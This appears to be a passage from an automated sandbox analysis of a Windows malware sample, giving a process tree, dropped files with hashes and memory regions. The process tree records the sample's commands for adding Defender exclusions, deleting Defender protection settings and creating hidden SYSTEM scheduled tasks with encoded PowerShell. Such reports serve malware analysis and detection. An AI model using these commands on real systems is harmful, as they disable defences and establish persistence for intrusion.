                                            PID:2356
                                          • C:\Windows\SysWOW64\reg.exe
                                            "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:32
                                            4⤵
                                              PID:776
                                            • C:\Windows\SysWOW64\reg.exe
                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\UBqYudvSNocU2" /t REG_DWORD /d 0 /reg:64
                                              4⤵
        • System Location Discovery: System Language Discovery
        PID:1436
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2476
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ZUXSmeDRU" /t REG_DWORD /d 0 /reg:64
        4⤵
        PID:1464
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2032
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\oXjeNNLqKAotC" /t REG_DWORD /d 0 /reg:64
        4⤵
        PID:840
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1856
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\xonCRuklPFipnPeqKpR" /t REG_DWORD /d 0 /reg:64
        4⤵
        PID:1840
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2564
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\hrOORTLiECQfZJVB" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2272
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1468
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\EMPJhNxQCousXoKTu" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2840
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2296
      • C:\Windows\SysWOW64\reg.exe
        "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\YSrBLfWUtIHnuviW" /t REG_DWORD /d 0 /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1828
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "gpAGCfptE" /SC once /ST 11:34:17 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:880
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "gpAGCfptE"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1664
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "gpAGCfptE"
      3⤵
      PID:3040
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1404
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:556
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1224
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1984
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "MFUxwpyluZmBswWip" /SC once /ST 02:21:26 /RU "SYSTEM" /TR "\"C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\kYFDSBV.exe\" 18 /site_id 525403 /S" /V1 /F
      3⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:1192
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "MFUxwpyluZmBswWip"
      3⤵
      PID:2084
  • C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\kYFDSBV.exe
    C:\Windows\Temp\YSrBLfWUtIHnuviW\vPOOfGstRnUMkHu\kYFDSBV.exe 18 /site_id 525403 /S
    2⤵
    • Checks computer location settings
    • Executes dropped EXE
    • Drops Chrome extension
    • Drops file in System32 directory
    • Drops file in Program Files directory
    • Modifies data under HKEY_USERS
    • Suspicious behavior: EnumeratesProcesses
    PID:2624
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "bKwcWZekAnYWEgmozo"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2180
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1920
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:2716
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2912
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /v "exe" /f /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:904
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ZUXSmeDRU\CtKylS.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "SEVCueFJyRflUhU" /V1 /F
      3⤵
      • Drops file in Windows directory
      • Scheduled Task/Job: Scheduled Task
      PID:2304
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "SEVCueFJyRflUhU2" /F /xml "C:\Program Files (x86)\ZUXSmeDRU\mBGnDaz.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2268
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /END /TN "SEVCueFJyRflUhU"
      3⤵
      PID:2252
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "SEVCueFJyRflUhU"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:1508
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "iJzencGmrLwIJF" /F /xml "C:\Program Files (x86)\UBqYudvSNocU2\VXAIJfS.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2316
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "qYXqheuptEbIX2" /F /xml "C:\ProgramData\hrOORTLiECQfZJVB\LAhPLEF.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:1248
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "JDYpgkNAOwNKhospY2" /F /xml "C:\Program Files (x86)\xonCRuklPFipnPeqKpR\cDHupRG.xml" /RU "SYSTEM"
      3⤵
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:2544
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "hPTErtfTjvBJRSQKVfY2" /F /xml "C:\Program Files (x86)\oXjeNNLqKAotC\yBsnZsO.xml" /RU "SYSTEM"
      3⤵
      • Scheduled Task/Job: Scheduled Task
      PID:2592
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /CREATE /TN "NGWtXtGwgKKYsphzV" /SC once /ST 19:34:39 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\YSrBLfWUtIHnuviW\KYKIuOjv\HyiwmhG.dll\",#1 /site_id 525403" /V1 /F
      3⤵
      • Drops file in Windows directory
      • System Location Discovery: System Language Discovery
      • Scheduled Task/Job: Scheduled Task
      PID:944
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /run /I /tn "NGWtXtGwgKKYsphzV"
      3⤵
      PID:1572
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2084
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:32
        4⤵
        • System Location Discovery: System Language Discovery
        PID:1076
    • C:\Windows\SysWOW64\cmd.exe
      cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2704
      • C:\Windows\SysWOW64\reg.exe
        REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v "SpyNetReporting" /f /reg:64
        4⤵
        • System Location Discovery: System Language Discovery
        PID:592
    • C:\Windows\SysWOW64\schtasks.exe
      schtasks /DELETE /F /TN "MFUxwpyluZmBswWip"
      3⤵
      • System Location Discovery: System Language Discovery
      PID:2064
  • C:\Windows\system32\rundll32.EXE
    C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\KYKIuOjv\HyiwmhG.dll",#1 /site_id 525403
    2⤵
    PID:1152
    • C:\Windows\SysWOW64\rundll32.exe
      C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\YSrBLfWUtIHnuviW\KYKIuOjv\HyiwmhG.dll",#1 /site_id 525403
      3⤵
      • Blocklisted process makes network request
      • Checks BIOS information in registry
      • Loads dropped DLL
      • Drops file in System32 directory
      • System Location Discovery: System Language Discovery
      • Enumerates system info in registry
      • Modifies data under HKEY_USERS
      PID:2076
      • C:\Windows\SysWOW64\schtasks.exe
        schtasks /DELETE /F /TN "NGWtXtGwgKKYsphzV"
        4⤵
        PID:2112
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:840
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2548
• C:\Windows\system32\gpscript.exe
  gpscript.exe /RefreshSystemParam
  1⤵
  PID:2560

Network

MITRE ATT&CK Enterprise v15

Downloads

• C:\Program Files (x86)\UBqYudvSNocU2\VXAIJfS.xml
  Filesize: 2KB
  MD5: 072eab27d8bb0d1a62092e888bfc44a4
  SHA1: e64e9d408a9812631056553114a2f4217f36cc18
  SHA256: d90e57f824ba84b874ea775b9dee2d910a3d06768b00ef854f908daef6a1dcd9
  SHA512: d1afc64c4c11ce9eb5ba753071103b8ca194fc93d3c09662620ed157c98f41ad8a07142d2a9ca63fc4889204d1e8c29030cecb2bda3574a6ffafc5f7d8e15223

• C:\Program Files (x86)\ZUXSmeDRU\mBGnDaz.xml
  Filesize: 2KB
  MD5: e70a83aa4b0a7230d88024e7c359ba89
  SHA1: 3a4cd281883deea0ec4ad230cf0193a35a884461
  SHA256: ee559630bf6f0d3ae25ee99993577c34bcd7302e5d64e1c919e9d2f008bcefec
  SHA512: f1cb41793b63919a7bb6ad44edd93cad3f66896876b0221968957c3e68f3a18abda8f29c79c699ef7e62e735605384c195a5e6baf406b7d215e22f7224d9d5aa

• C:\Program Files (x86)\oXjeNNLqKAotC\yBsnZsO.xml
  Filesize: 2KB
  MD5: b2d03d48adaf3184a9b7b299214181d2
  SHA1: 2383a0fbd10cd0d303d36fec9eb5783b721263c9
  SHA256: 6c1abcd2ab2f67eac4b8353a42a3987be0ca63a7e6df82a855e47a199f8cae14
  SHA512: f66d87a94231f02ec8a6aafa738888fccbad9ecb4a30dfcaa8c903fbf9a91f9dc20cd44d3bc080a3eea8d4dc2831a6f16b3e7ce4bf38c25a8cba1d1ce24f3d13

• C:\Program Files (x86)\xonCRuklPFipnPeqKpR\cDHupRG.xml
  Filesize: 2KB
  MD5: e04f236fb26e8be735e9e67bd3f62b3e
  SHA1: 34e74084f9fdd6d2bba4781a74c9a7484b5ddaf2
  SHA256: d02c26f553c61bf2e924daa5f3cce4323d9979456e3aee7a31b88865943bd30a
  SHA512: dc1fce8c401f872df97dde89cec261e4e36678afc6461325cc1c60307c0c5da38224fb43cb5c295adb72148eb8dae1a1369108e171e070aff9e6dc5908a8fbc4

• C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi
  Filesize: 1.1MB
  MD5: a9170dcac47effdfbe224abf0848d71b
  SHA1: e6a9222107c451ca347b986f482a60aa9e995f61
  SHA256: 7b443f7e3f826d91490cb711ba109e38d3c8ad71b0707d4bdcbbf8eeaf39c694
  SHA512: 9e23e556b423dce2730b4e749d86ce440dde5f02054c206e56f8a0214cfebc303587ad4c25f54fc3892999f304814c952e606480a5286ac111680673786c5f35

• C:\ProgramData\hrOORTLiECQfZJVB\LAhPLEF.xml
  Filesize: 2KB
  MD5: 4d2b1d6bfb823cf7c990202c75ae113c
  SHA1: ecc69483bacf9dac44a937bab9194b55ebe8663b
  SHA256: 833d79e6f2ebf901f4a2e2b78946bee048099c4aa916380db67071f1700bc2b3
  SHA512: be1f4589fd14a3c090dbdbdd04d3bcffdc682477a0a7ea7228e7f05a19a3bdfa86a53cdd398b436b5c55f6b6e50cfed8c0e62f833ee66f9f02ab65e26db8afb7

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\en_GB\messages.json
  Filesize: 187B
  MD5: 2a1e12a4811892d95962998e184399d8
  SHA1: 55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720
  SHA256: 32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb
  SHA512: bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\fa\messages.json
  Filesize: 136B
  MD5: 238d2612f510ea51d0d3eaa09e7136b1
  SHA1: 0953540c6c2fd928dd03b38c43f6e8541e1a0328
  SHA256: 801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e
  SHA512: 2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\_locales\pt_BR\messages.json
  Filesize: 150B
  MD5: 0b1cf3deab325f8987f2ee31c6afc8ea
  SHA1: 6a51537cef82143d3d768759b21598542d683904
  SHA256: 0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf
  SHA512: 5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

• C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
  Filesize: 10KB
  MD5: d61acef6abaadc93a1c75058910af648
  SHA1: 9b9e06f195a938ccd6863562af924b76bd324386
  SHA256: 97d5e80a425c3d79056837e3a94e42e81a9fd18919470e660637ee9a5bb4a3b6
  SHA512: f62cf353db33bc5e801c95de45b95200c2423729086bb738f104b7e42ea1a021d3d725434d95cedc25ddd5b39d595a398bef2b759e101310b166d2a4bcb663c0

• C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
  Filesize: 7KB
  MD5: 0fcb8a3374e1c47c05e8c5a449f6a7a6
  SHA1: 0c65d1b30a65fa7c36068cf049d26dd8c51465ff
  SHA256: df49d9d7bc9df075dc50729aa60f37147fd53ec4fc4e78a6d8d1648e331c6bca
  SHA512:

                                                                36fa287e59205e07229ed99006732d9b4f3c46f0b9f6e7a041b90ed04a9355475f07a65c6fcbe4e5b5e88e900a72b7b0b5bc1a4e91b0ef537e319d040274ec30

                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                0bd71c6960b427be5640733982064d64

                                                                SHA1

                                                                ad1a7ba29afd11ed44788133fb24ba7a27d012fa

                                                                SHA256

                                                                afa0cbe09cabdbe1c693f47b15aa19fec5e704ae038bfe18cfab9eeb52477d68

                                                                SHA512

                                                                6e02cd3a7a1d6fcacc4b21bbef82c34d2a6e7e18c4caa0d0962a3e9dffcd5d7e8263336ee0003ba37891b1dba0f6d29406aabe279f1b714275faf9f540f41a76

                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                03de9ceef8336bc2f82717fda9890dd8

                                                                SHA1

                                                                a1cff7ab987450db1f6c41eda58224b05294b2f7

                                                                SHA256

                                                                99bc0ef06bab737d9e9f3d096ffb8a222eaa546b428df48fbab899569912846c

                                                                SHA512

                                                                7125556d5fb5ba82417910359b557b599f0f3626e54fb063d8b0081d162e12d303e3adca1201194ca82a1b4d55cc84508f4d8cd25eae89368856cfdc423acc7c

                                                              • C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\4k8o8gx5.default-release\prefs.js

                                                                Filesize

                                                                7KB

                                                                MD5

                                                                03f43a6e313d5e43463957d596543e45

                                                                SHA1

                                                                d18df22c456f65a845d98eee9a1ac6c28653e6fb

                                                                SHA256

                                                                98f17221891cc1f224fcc525a1a223f8b4136fc0527e5dc5ffafbfebb44b8ca8

                                                                SHA512

                                                                21543d53898f2545945cdcf70f1b6c3450a2628a893e99ac3591014cf1d833919faf1a7497001f46f7a6d43598ea487a8f3578f7c225eb2ae5ffecdd0a08109d

                                                              • C:\Windows\Temp\YSrBLfWUtIHnuviW\KYKIuOjv\HyiwmhG.dll

                                                                Filesize

                                                                6.2MB

                                                                MD5

                                                                8cfc8a5c654e986ab3de168ecbc93096

                                                                SHA1

                                                                a745e47565aed873f5f5264543479266d8918a64

                                                                SHA256

                                                                2996bcb9d033414f6dce67539a71bf29250dc19a66424944065bf5cdf285500a

                                                                SHA512

                                                                99398bbaed5f5547331f21c9e9b2eda5b4842ad88b950f1cce4a04202d45a25a83fdd1593f6b15d05fdee7ba4872ba287b4a5e5c1a0c8c337311eb8b3326dac3

                                                              • C:\Windows\Temp\YSrBLfWUtIHnuviW\tLuvxbcI\ByueSfwTiIlafwvu.wsf

                                                                Filesize

                                                                8KB

                                                                MD5

                                                                9938afa73abcb02a3fe1907347a78543

                                                                SHA1

                                                                207500f4a96b7dca85435e4e00a8691122cf6b28

                                                                SHA256

                                                                a1f9ace73502337a1f88fed69f48806defa0b2487aa46db1d25daa3d39a5aa03

                                                                SHA512

                                                                5fdd1b733d132adeab718a97c9abe57427a34b172e0e10d357ec7709eeca34dc24b5dbdb7017d7f4d98f2f44c1a953f34c0ef148487100c5bcda8eee47134de8

                                                              • C:\Windows\system32\GroupPolicy\Machine\Registry.pol

                                                                Filesize

                                                                5KB

                                                                MD5

                                                                8a23e7417f0e171228321494ead8e634

                                                                SHA1

                                                                929d7a156f7bdff24875772e56f69d2b0715a59f

                                                                SHA256

                                                                fc2c39e0dc4a7e8e5f576cfef0253ef6adca13617ea7983b0f0a0ca2ddab8ef3

                                                                SHA512

                                                                248680d761e09aeac8580416201ccc06e21258f98a9db3187a29ff525896cc79cd91827f2b52a34718f204dabe95d2311314439f74c0cb3019f4b89ce92b0037

                                                              • C:\Windows\system32\GroupPolicy\gpt.ini

                                                                Filesize

                                                                268B

                                                                MD5

                                                                a62ce44a33f1c05fc2d340ea0ca118a4

                                                                SHA1

                                                                1f03eb4716015528f3de7f7674532c1345b2717d

                                                                SHA256

                                                                9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

                                                                SHA512

                                                                9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

                                                              • \??\PIPE\srvsvc

                                                                MD5

                                                                d41d8cd98f00b204e9800998ecf8427e

                                                                SHA1

                                                                da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                SHA256

                                                                e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                SHA512

                                                                cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                              • \Users\Admin\AppData\Local\Temp\7zS55CE.tmp\Install.exe

                                                                Filesize

                                                                6.3MB

                                                                MD5

                                                                ded964e022a37d93d434091ec75f9881

                                                                SHA1

                                                                e89a551ac1f19dc3838e21157667e2f98d84d06b

                                                                SHA256

                                                                9d8729b9ca0547bf3679e88b9c2c5ae941fcfe67dfd7dfc598cb304d6624ddde

                                                                SHA512

                                                                13f0873cc797eeb7a4a1606ea3dc95f0d1f96bf1dfad286ee3959f0b885426214c24c1ea2422a46191f78063b75200d7ad9065d5654a7758086a9e41f7cf75af

                                                              • \Users\Admin\AppData\Local\Temp\7zS585D.tmp\Install.exe

                                                                Filesize

                                                                6.8MB

                                                                MD5

                                                                6cb87a9fc7dc1f2a5410fd428f5460f0

                                                                SHA1

                                                                2885b2d28a333d7bd9d6488ba2bf7312fc811e3a

                                                                SHA256

                                                                fa622e0a4d023232f16015c8af2f464933217ab600d91ccdaf0099db232c8b52

                                                                SHA512

                                                                4c266dee0538259df0a2f9625abaf410c587e63d10269f9547820582b5758201a5371f705f0cbd65e72348c2276cd8c6b393c49efa095cd47b718ff029733269

                                                              • memory/552-48-0x000000001B840000-0x000000001BB22000-memory.dmp

                                                                Filesize

                                                                2.9MB

                                                              • memory/552-49-0x0000000002690000-0x0000000002698000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/944-59-0x000000001B540000-0x000000001B822000-memory.dmp

                                                                Filesize

                                                                2.9MB

                                                              • memory/944-60-0x0000000002240000-0x0000000002248000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/1080-30-0x000000001B630000-0x000000001B912000-memory.dmp

                                                                Filesize

                                                                2.9MB

                                                              • memory/1080-31-0x00000000027E0000-0x00000000027E8000-memory.dmp

                                                                Filesize

                                                                32KB

                                                              • memory/2076-323-0x00000000013B0000-0x0000000001F0D000-memory.dmp

                                                                Filesize

                                                                11.4MB

                                                              • memory/2624-121-0x0000000003490000-0x00000000034F8000-memory.dmp

                                                                Filesize

                                                                416KB

                                                              • memory/2624-290-0x0000000003560000-0x00000000035D6000-memory.dmp

                                                                Filesize

                                                                472KB

                                                              • memory/2624-300-0x0000000003DA0000-0x0000000003E5A000-memory.dmp

                                                                Filesize

                                                                744KB

                                                              • memory/2624-86-0x0000000002CF0000-0x0000000002D75000-memory.dmp

                                                                Filesize

                                                                532KB

                                                              • memory/2832-22-0x0000000010000000-0x0000000010B5D000-memory.dmp

                                                                Filesize

                                                                11.4MB